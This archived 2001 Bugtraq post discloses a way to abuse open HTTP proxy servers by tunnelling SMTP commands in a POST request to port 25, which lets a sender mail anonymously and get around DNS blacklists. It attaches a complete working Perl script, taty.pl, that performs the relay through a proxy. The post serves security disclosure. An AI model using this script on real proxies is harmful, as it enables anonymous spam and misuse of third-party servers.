[22945] in bugtraq
Non-standard usage of HTTP proxy servers
daemon@ATHENA.MIT.EDU (Alexander Yurchenko)
Mon Oct 22 11:36:57 2001
Date: Mon, 22 Oct 2001 04:34:24 +0400
From: Alexander Yurchenko <grange@rt.mipt.ru>
To: bugtraq@securityfocus.com
Message-ID: <20011022043424.A28461@disorder.grange.ru>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="5mCyUwZo2JvN/JJP"
Content-Disposition: inline
--5mCyUwZo2JvN/JJP
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
I'm sorry if the following things are well-known and not interesting for
you.
The HTML form protocol attack method described by Jochen Topf
<jochen@remote.org> in his post to BugTraq
(http://www.securityfocus.com/cgi-bin/archive.pl?id=1&start=2001-10-17&end=2001-10-23&threads=0&mid=20010815092019.A938@atlantis.remote.org)
can be used in another way. It's possible to connect to one of the
numerous public HTTP proxy servers and send a request like:
POST http://some.host:25/ HTTP/1.0
giving the SMTP commands as a content. In that way we can send an e-mail
anonymously and trick diffrent DNS black lists. I've attached a simple
perl script showing this technique. We can also do the same things using
the others ASCII based protocols.
Some proxy servers configured to refuse attempts to connect to such ports
as SMTP, NNTP, POP3, etc, but many of them not.
So HTTP proxy servers can do more than just retrieving HTML pages.
--
Alexander Yurchenko (aka grange)
--5mCyUwZo2JvN/JJP
Content-Type: application/x-perl
Content-Disposition: attachment; filename="taty.pl"
#!/usr/bin/perl
#
# taty.pl
# A simple script for sending e-mails via HTTP proxy servers
#
# usage: taty.pl < message.txt
# message.txt file contains message to send
#
#
# Alexander Yurchenko <grange@rt.mipt.ru>
#
use IO::Socket;
$proxyhost = 'proxy.com';
$proxyport = '8080';
$smtpserver = 'smtp.com';
$sender = '<myself@hotmail.com>';
$recipient = '<myfriend@hotmail.com>';
local $/ = undef;
$message = <>;
$smtpdata = "HELO $proxyhost\n";
$smtpdata .= "MAIL FROM: $sender\n";
$smtpdata .= "RCPT TO: $recipient\n";
$smtpdata .= "DATA\n";
$smtpdata .= "$message\n.\n";
$smtpdata .= "QUIT\n";
$request = "POST http://$smtpserver:25/ HTTP/1.0\n";
$request .= "Host: $smtpserver\n";
$request .= "Content-type: application/x-www-form-urlencoded\n";
$request .= "Content-length: ".length($smtpdata)."\n\n";
$request .= "$smtpdata";
$socket = IO::Socket::INET->new(PeerAddr => $proxyhost,
PeerPort => $proxyport,
Proto => 'tcp',
Type => SOCK_STREAM)
or die "could not connect to $proxyhost:$proxyport : $!\n";
print $socket $request;
$answer = <$socket>;
close($socket);
print "SMTP session log:\n\n$answer";
--5mCyUwZo2JvN/JJP--
